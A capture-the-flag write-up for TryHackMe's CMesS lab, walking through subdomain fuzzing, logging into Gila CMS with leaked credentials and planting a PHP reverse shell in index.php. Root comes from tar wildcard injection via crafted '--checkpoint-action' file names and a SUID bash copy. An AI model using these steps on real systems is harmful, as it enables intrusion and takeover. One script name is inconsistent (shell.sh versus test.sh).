CMesS-TRYHACKME

 

This is a write for TryHackMe's room named CMesS.

Room is available here  :- https://tryhackme.com/room/cmess

This write-up will contain the steps which needs to be done and is straight forward to follow.

Also note IP 10.10.138.197 will changes in your case.

Do Entry in /etc/hosts
==================
⇒ 10.10.138.197 cmess.thm

Enumeration
===========
⇒ nmap -sC -sV 10.10.138.197
    • 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    • 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
⇒ Gila CMS on port 80

Dir-busting
==========
⇒ /opt/tools/dirsearch/dirsearch.py -E -x 400,500 -t 100 -u http://10.10.138.197 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    • Revealed interesting directories like /admin but no access and room said no brute forcing needed.

Sub Domain using WFUZZ
======================
HINT: Have you tried fuzzing for subdomains?
⇒ wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hl 107
⇒ We got dev.cmess.thm
⇒ Add this in /etc/hosts
    • 10.10.138.197 cmess.thm dev.cmess.thm
⇒ http://dev.cmess.thm/ reveals
    • User: andre@cmess.thm Password: KP**********

Sub Domain using FFUF
=====================
⇒ https://github.com/ffuf/ffuf
Using “Custom Automatically Calibrate Filtering” feature of FFUF
⇒ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -acc "www"
    • dev [Status: 200, Size: 934, Words: 191, Lines: 31]
⇒ Read more about FFUF Automatically Calibrate Filtering here:- https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#custom-automatic-calibration-filtering

Another trick is to use FFUF filters:
⇒ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -fl 108
    • dev [Status: 200, Size: 934, Words: 191, Lines: 31]

Initial Shell
==========
⇒ Login to http://10.10.138.197/admin with the above credentials
⇒ Go to http://10.10.138.197/admin/fm
    • Edit index.php with of php reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
    • Remember to put your own IP and Port number
    • Also remember to remove <?php tag as we already have one
    • Open a netcat listen on the port which you entered earlier
    • Go to http://10.10.138.197/
    • We will get a shell with user www-data on the netcat listener

Privilege Escalation - User
=====================
⇒ Run https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh on target
    • Found an interesting file /opt/.password.bak with User andres password
    • Found another interesting /etc/crontab entry
        ◇ */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
⇒ SSH as user "andre" with the password from /opt/.password.bak file
⇒ Get the user flag at /home/andre/user.txt

Privilege Escalation - Root
=====================
⇒ Using techniques from this famous article https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
• In the same directory where the back is being made (in above case got to cd /home/andre/backup), do the following:
    ◇ echo "" > "--checkpoint-action=exec=sh shell.sh"
    ◇ echo "" > --checkpoint=1
    ◇ Content of test.sh are:
        ▪ cp /bin/bash /tmp/bash
        ▪ chmod +s /tmp/bash
⇒ After the cronjob runs, we will have /tmp/bash with suid bit set

⇒ Run /tmp/bash -p to get root shell and flag from /root/root.txt

Thanks for reading. Please lets me know if this works for you too in the comments.